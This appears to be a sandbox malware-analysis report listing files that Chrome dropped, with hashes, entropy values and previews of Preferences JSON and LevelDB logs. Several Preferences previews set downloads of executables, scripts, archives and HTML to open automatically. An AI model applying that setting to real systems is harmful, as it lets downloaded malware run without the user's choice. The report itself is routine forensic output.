                                                              Encrypted:false
                                                              SSDEEP:384:RoXt3LlxpXG1kXqKf/pUZNCgVLH2HfDyrUNHGklcr74N:SLlzG1kXqKf/pUZNCgVLH2Hf+rUxGPrC
                                                              MD5:3B8502763C8797C9F82879D19CA25C05
                                                              SHA1:7DEA9EF8991F6C38FE35872467908ED67EEA59B8
                                                              SHA-256:7254F796D96C27FD2170398D970CE97AA7959375225D7B0D63573DBCFBB0A0D9
                                                              SHA-512:DCE5BA9E77EC4789D09C3AC67C1C6AF442A2D17719AA43A922A481201E759062CF4DDF0A07A257012A55363AF75BEB164F7753E32585AF7B3EDCD80F615896AE
                                                              Malicious:false
                                                              Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13298721014497197","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):17356
                                                              Entropy (8bit):5.571100573142189
                                                              Encrypted:false
                                                              SSDEEP:384:RoXteLlxpXG1kXqKf/pUZNCgVLH2HfDyrUMlu74Ld:pLlzG1kXqKf/pUZNCgVLH2Hf+rUj7i
                                                              MD5:94B36F5944C261AEBF7464E208234C0C
                                                              SHA1:663F662AB2776CD73DE7BD8E991D587745CE6DC8
                                                              SHA-256:04ED689A4F7E40C76E18BAE522540957CDC23F01CFB5C8078D474199DD31444D
                                                              SHA-512:C5D2385133076908DD2A0C9BA23F498381FB989E3DDF29ADC15D804B8D12DB80F7F04933011A649ACDBCC9207485A27BD5E6B929057E4A12E293C471E0CF0F6E
                                                              Malicious:false
                                                              Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13298721014497197","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):19795
                                                              Entropy (8bit):5.563990957298606
                                                              Encrypted:false
                                                              SSDEEP:384:RoXt3LlxpXG1kXqKf/pUZNCgVLH2HfDyrUNHG5lZr74J:SLlzG1kXqKf/pUZNCgVLH2Hf+rUxGxru
                                                              MD5:69B9CC88195BCE3421189F519640AD75
                                                              SHA1:865EA4CF0790E8A88D3DAE6A15001591834EB8FE
                                                              SHA-256:7661F803B25594727D37293DA9E9435CCF36DB2F61259FB9DF2E8B909EFB8C58
                                                              SHA-512:D4F90CE9FE2C7CABEBA1AA64EAB66338B12EC14224D912921950A000A2E3C8A95B6E2B89D2EE2B734B0076086F26224631CFA4D475D841D3668417BBEEA0F9DC
                                                              Malicious:false
                                                              Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13298721014497197","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):11217
                                                              Entropy (8bit):6.069602775336632
                                                              Encrypted:false
                                                              SSDEEP:192:GbylJnlTwGB7V9Hne4qasKxXItmLG48gcLg/PkI:Gb+nldByaFx4toj8VEPT
                                                              MD5:90F880064A42B29CCFF51FE5425BF1A3
                                                              SHA1:6A3CAE3996E9FFF653A1DDF731CED32B2BE2ACBF
                                                              SHA-256:965203D541E442C107DBC6D5B395168123D0397559774BEAE4E5B9ABC44EF268
                                                              SHA-512:D9CBFCD865356F19A57954F8FD952CAF3D31B354112766C41892D1EF40BD2533682D4EC3F4DA0E59A5397364F67A484B45091BA94E6C69ED18AB681403DFD3F3
                                                              Malicious:false
                                                              Preview:{"file_hashes":[{"block_hashes":["A+1PYW3V6CJbBuQ7aqrgYhyH3bT8PKyBXp3hN2slpI0=","WSOpQRkYTHjPSlG9Zif2a7TNhy43NDcG1Zg5Nv0UbH0=","jDctR8ImG5KZrQKm4kDjUB7FokSJfjo/pmvFowRVlaY=","LPxhhJiuU0lprt0T6flpS7TkaDg7MocrbmzO65xH6RI=","nZ9zLb2By96AkKXALRM+C0Eu11XUjPiMXEKjiCPdtHE=","wifibc1QfMBN2jrtUtLgsCefvuceTpAatmLvul11RJA=","dHjWlSIIdjj7MWqg3T8MG58RuuqRXk32vqi/13JqEgA=","zd3DV7dbvfNvx1hdhU01fW5ily52DLN0CFL/ADaEeTI=","DpjXcO85FFFY9KJFPkGNfFUtdQIOsGwO5jUckiUwY14=","gqid6l1+mk/6yWgUECRofI9lMipXgXh2jEN2+CxmPE0=","prDB91X2Mmfg/M/txVMITWBmEGbOGjqBTP7CMjYqdHs=","yLPAqV4gqoyS/zFkEt3Cn2j0q2v9QOSthVFfWn8EzCM=","EPQ3jzdrLkAHyvf3920B5Y3aAkO1IJdn/UtbnAmq6T0=","+oOc6ca+ChKUpTu+oa2ZRxRE+wG3QJmuYWEvYCs40NI=","3mBGNAiRlTANEQkqzU3TEi+5wJ0ubR5uwtS4/9OOM7w=","1A9NNawxuhu95H5eThvf1rewJ4QQWhhPNxJXO1C/n68=","E3vWLQxzmj+e5QxYbUscllJ5n0ITpw5JBHV1Kph3/KM=","i3I8ghdTF9c1ZXNBZmvsID+DV4gxBVN27rj9wsMtRpg=","R8B8qYabnMSlLPhrtu0hGYrHn3llsMHqBbi70gkIjEE=","rhlzuEvv2KRAFMms896xFwkNgPrw6WvmgPn6xrBSa2Y=","LAMXv6sRb0VZrY34aVXF3Fftxs
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):38
                                                              Entropy (8bit):1.8784775129881184
                                                              Encrypted:false
                                                              SSDEEP:3:FQxlXNQxlX:qTCT
                                                              MD5:51A2CBB807F5085530DEC18E45CB8569
                                                              SHA1:7AD88CD3DE5844C7FC269C4500228A630016AB5B
                                                              SHA-256:1C43A1BDA1E458863C46DFAE7FB43BFB3E27802169F37320399B1DD799A819AC
                                                              SHA-512:B643A8FA75EDA90C89AB98F79D4D022BB81F1F62F50ED4E5440F487F22D1163671EC3AE73C4742C11830214173FF2935C785018318F4A4CAD413AE4EEEF985DF
                                                              Malicious:false
                                                              Preview:.f.5................f.5...............
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):372
                                                              Entropy (8bit):5.1878855354439635
                                                              Encrypted:false
                                                              SSDEEP:6:nPGtU8uHuVq2Pwkn23iKKdK25+Xqx8chI+IFUtqVCPGtUBUOgZmwYVCPGtU6HIkP:nPGmVuVvYf5KkTXfchI3FUtRPGmBUOg6
                                                              MD5:927426CC24DD318ECEE5DB5EF3F10C37
                                                              SHA1:C0B4575B7A2AC8F5D21ED3249334554D97DA2F26
                                                              SHA-256:8454658735652C5E5DF74EE318BADA72D3288AA9ECFF75F5336E97708375BFB9
                                                              SHA-512:4C2332E5539010CFB07021272875F74A0D147FBD53FC818B4390D84E2DD122D9AEADF661378911A1C477281A0D5353E68AC0CEE507122E02D1FB5F7134424E0E
                                                              Malicious:false
                                                              Preview:2022/06/03-11:10:26.103 1bd0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2022/06/03-11:10:26.104 1bd0 Recovering log #3.2022/06/03-11:10:26.105 1bd0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):372
                                                              Entropy (8bit):5.1878855354439635
                                                              Encrypted:false
                                                              SSDEEP:6:nPGtU8uHuVq2Pwkn23iKKdK25+Xqx8chI+IFUtqVCPGtUBUOgZmwYVCPGtU6HIkP:nPGmVuVvYf5KkTXfchI3FUtRPGmBUOg6
                                                              MD5:927426CC24DD318ECEE5DB5EF3F10C37
                                                              SHA1:C0B4575B7A2AC8F5D21ED3249334554D97DA2F26
                                                              SHA-256:8454658735652C5E5DF74EE318BADA72D3288AA9ECFF75F5336E97708375BFB9
                                                              SHA-512:4C2332E5539010CFB07021272875F74A0D147FBD53FC818B4390D84E2DD122D9AEADF661378911A1C477281A0D5353E68AC0CEE507122E02D1FB5F7134424E0E
                                                              Malicious:false
                                                              Preview:2022/06/03-11:10:26.103 1bd0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2022/06/03-11:10:26.104 1bd0 Recovering log #3.2022/06/03-11:10:26.105 1bd0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):469
                                                              Entropy (8bit):5.040900368977623
                                                              Encrypted:false
                                                              SSDEEP:12:vvK3J7+xMAeLzANBRo2Z/pSvn1yYWBk778B/xgskJRvLdBfhdDJkWk:vUJceLqBRocA1yYsY78BJgskvv5pZkWk
                                                              MD5:0099D3D332E08EDDF221CEE264465E8A
                                                              SHA1:8518EE840106B324B5781E83CBA814FF3682DF92
                                                              SHA-256:5A8345D641515E7FB52C62A4F3C86A7C366BB2F1BDEA6C77BD0B4726D9F5288E
                                                              SHA-512:7BD263B393E9D4C01432D6D0B37C5198F4E1A45E2AA9AB974E94F58FAFC1722782F975E43B63B009C555EBA45C7870305FE71F59D210C83333063DBD1F416B35
                                                              Malicious:false
                                                              Preview:..........."+....1..c..desktop..file..html..user..users*G......1......c......desktop......file......html......user......users..2.........1........c........d........e...........f........h........i........j........k........l.........m........n........o.........p........r........s..........t.........u...:A.................................................................BM...I...... ........*%file:///C:/Users/user/Desktop/1.html2.:................J...............!
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):1518
                                                              Entropy (8bit):4.8062213955365065
                                                              Encrypted:false
                                                              SSDEEP:24:Y26aL3M33ayFGRaXa63aDaaraqavatZa+RdsdydR/RdsdrJdMHQmQYhbG7n/iy:Y2nzM3qyvK6qDHGXCtwWs+RLs9zMHSYm
                                                              MD5:10E45841166C3E8A4EC4EC7640B300FF
                                                              SHA1:F57A740BB8FE6979AD50DB1A587B3AD06240CCA9
                                                              SHA-256:3CF57024965FD1EA05D3AC849FF5538CBECC6086382F9825CC9345261C325C31
                                                              SHA-512:27BF5F7B7D5457EE5BF1977B04E0FFCA941832518CECA65DD07F94CEC93E75B018432E6389CFAB582D7019BC57A15FEBB7C02BC78307DA711476259592EC82D0
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"isolation":[],"server":"https://redirector.gvt1.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expi
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):4927
                                                              Entropy (8bit):4.942296130114018
                                                              Encrypted:false
                                                              SSDEEP:48:Yc1kKSChkSirbNqARiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzC:nVLR61pIKI95k0JCKL8nbOTlVuHn
                                                              MD5:91B185C1006719F76197121E16706158
                                                              SHA1:39E2BA8B661F1A4EF2DDE64FD9EF34B1A47762C5
                                                              SHA-256:B8136336231CE45BA78EB4565923AB5D679C1173ECE217C5AF0740125A7FADBA
                                                              SHA-512:C1ECA233CDE346D6B45DE87CC229E4F5CEE69C9CF9B1FBBC50850E1CF85B4182AF15DFDE837452CB1B46F2DD82D9E0D215D1CFD2D96EC5957973EFACDAE3366E
                                                              Malicious:false
                                                              Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_rece
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):19796
                                                              Entropy (8bit):5.56403969144979
                                                              Encrypted:false
                                                              SSDEEP:384:RoXt3LlxpXG1kXqKf/pUZNCgVLH2HfDyrUNHGklcr74N:SLlzG1kXqKf/pUZNCgVLH2Hf+rUxGPrC
                                                              MD5:3B8502763C8797C9F82879D19CA25C05
                                                              SHA1:7DEA9EF8991F6C38FE35872467908ED67EEA59B8
                                                              SHA-256:7254F796D96C27FD2170398D970CE97AA7959375225D7B0D63573DBCFBB0A0D9
                                                              SHA-512:DCE5BA9E77EC4789D09C3AC67C1C6AF442A2D17719AA43A922A481201E759062CF4DDF0A07A257012A55363AF75BEB164F7753E32585AF7B3EDCD80F615896AE
                                                              Malicious:false
                                                              Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13298721014497197","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):325
                                                              Entropy (8bit):4.971623449303805
                                                              Encrypted:false
                                                              SSDEEP:6:YHpoNXR8+eq7JdV5p7DHJShsDHF4R8HLJ2AVQBR70S7PMVKJw1K3KnMRK3VY:YHO8sdHfHYhsBdLJlyH7E4f3K33y
                                                              MD5:8CA9278965B437DFC789E755E4C61B82
                                                              SHA1:5776B6C90CA1D2DDC765ED673B5E6DC8E167F0D6
                                                              SHA-256:A57D9231244C1FBDE58A1BF50CAD3A1E3EA28D042BFA272782B65139446E7C51
                                                              SHA-512:3065FE0743AD88E02F8C8FF6CF03B832B616DD08061EAE25A5106422228D45EB999EE2CBE4E9C96D5FFC108CB817766240E27BF97E3E5C2A58081D369E2968F8
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248516514667526","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):270336
                                                              Entropy (8bit):0.0012471779557650352
                                                              Encrypted:false
                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                              Malicious:false
                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):325
                                                              Entropy (8bit):4.971623449303805
                                                              Encrypted:false
                                                              SSDEEP:6:YHpoNXR8+eq7JdV5p7DHJShsDHF4R8HLJ2AVQBR70S7PMVKJw1K3KnMRK3VY:YHO8sdHfHYhsBdLJlyH7E4f3K33y
                                                              MD5:8CA9278965B437DFC789E755E4C61B82
                                                              SHA1:5776B6C90CA1D2DDC765ED673B5E6DC8E167F0D6
                                                              SHA-256:A57D9231244C1FBDE58A1BF50CAD3A1E3EA28D042BFA272782B65139446E7C51
                                                              SHA-512:3065FE0743AD88E02F8C8FF6CF03B832B616DD08061EAE25A5106422228D45EB999EE2CBE4E9C96D5FFC108CB817766240E27BF97E3E5C2A58081D369E2968F8
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248516514667526","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):325
                                                              Entropy (8bit):4.9616384877719995
                                                              Encrypted:false
                                                              SSDEEP:6:YHpoNXR8+eq7JdV5pirhsDHF4R8HLJ2AVQBR70S7PMVKJw1K3KnMRK3VY:YHO8sdHirhsBdLJlyH7E4f3K33y
                                                              MD5:B0429187E1BE99DE4D548DC5B2EDEA0A
                                                              SHA1:B3E07BEE5D753BF1B613BD2DE665C7C21E8184F6
                                                              SHA-256:D8DABBF936DAB4F17437ECA255020EA847D76D6B789F9486010C95E995CFED03
                                                              SHA-512:233F7BDAA848A295E9F58CA52761829FE1044DA1DE1FBCAC407FADC8C7ABA1E4FFD7CA7A4FBE649E83FD1815DC2E3619ACB2A22CE5B2C7241E474CDB9AF2F7ED
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248516523181804","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):270336
                                                              Entropy (8bit):0.0012471779557650352
                                                              Encrypted:false
                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                              Malicious:false
                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):325
                                                              Entropy (8bit):4.9616384877719995
                                                              Encrypted:false
                                                              SSDEEP:6:YHpoNXR8+eq7JdV5pirhsDHF4R8HLJ2AVQBR70S7PMVKJw1K3KnMRK3VY:YHO8sdHirhsBdLJlyH7E4f3K33y
                                                              MD5:B0429187E1BE99DE4D548DC5B2EDEA0A
                                                              SHA1:B3E07BEE5D753BF1B613BD2DE665C7C21E8184F6
                                                              SHA-256:D8DABBF936DAB4F17437ECA255020EA847D76D6B789F9486010C95E995CFED03
                                                              SHA-512:233F7BDAA848A295E9F58CA52761829FE1044DA1DE1FBCAC407FADC8C7ABA1E4FFD7CA7A4FBE649E83FD1815DC2E3619ACB2A22CE5B2C7241E474CDB9AF2F7ED
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248516523181804","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):4927
                                                              Entropy (8bit):4.942296130114018
                                                              Encrypted:false
                                                              SSDEEP:48:Yc1kKSChkSirbNqARiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzC:nVLR61pIKI95k0JCKL8nbOTlVuHn
                                                              MD5:91B185C1006719F76197121E16706158
                                                              SHA1:39E2BA8B661F1A4EF2DDE64FD9EF34B1A47762C5
                                                              SHA-256:B8136336231CE45BA78EB4565923AB5D679C1173ECE217C5AF0740125A7FADBA
                                                              SHA-512:C1ECA233CDE346D6B45DE87CC229E4F5CEE69C9CF9B1FBBC50850E1CF85B4182AF15DFDE837452CB1B46F2DD82D9E0D215D1CFD2D96EC5957973EFACDAE3366E
                                                              Malicious:false
                                                              Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_rece
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):17703
                                                              Entropy (8bit):5.576909857172219
                                                              Encrypted:false
                                                              SSDEEP:384:RoXt3LlxpXG1kXqKf/pUZNCgVLH2HfDyrUhl0r746:SLlzG1kXqKf/pUZNCgVLH2Hf+rUUr7R
                                                              MD5:31D4AA1723FAD27E86084932A44FEE40
                                                              SHA1:DB7FF12527A318C8816D8A37BA95B7D72B4E5695
                                                              SHA-256:C23D6AB27CE3925F8873BAA58C72FCD7B7D5E6B4193E53CA8F291F11AF3C2C8C
                                                              SHA-512:3BB80A87ABA844E574008AB23DEE4B3E5025AB9980AC5651680054A7445ABE16E1B137365F49FF2BF811E2BF25A56F030F970979CD9A923CCBD8E7BCE5F4CD17
                                                              Malicious:false
                                                              Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13298721014497197","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):3473
                                                              Entropy (8bit):4.884843136744451
                                                              Encrypted:false
                                                              SSDEEP:96:6FGX0G70GhIGpyGzRDYLiEHYDBKGzUGaCGjHGESHG/OG6mhM:6Fe0i0sIIyGzRDYLiEHYDBKSUpCQHrSP
                                                              MD5:494384A177157C36E9017D1FFB39F0BF
                                                              SHA1:CE5D9754A70CD84CEE77C9180DB92C69715BE105
                                                              SHA-256:07CF0A5189FAD30A4AA721F4F6DA1B15100991115833EACFA1E2DC84A1B54337
                                                              SHA-512:BFB80EEC0C0B5D9E487047703BE49826321A4D249422E0C81E978E6C8A310F41C7B4B8F849229BA87484FDF4831DD6A98FF994D0FDA5CE3D341CE615C15F2F1C
                                                              Malicious:false
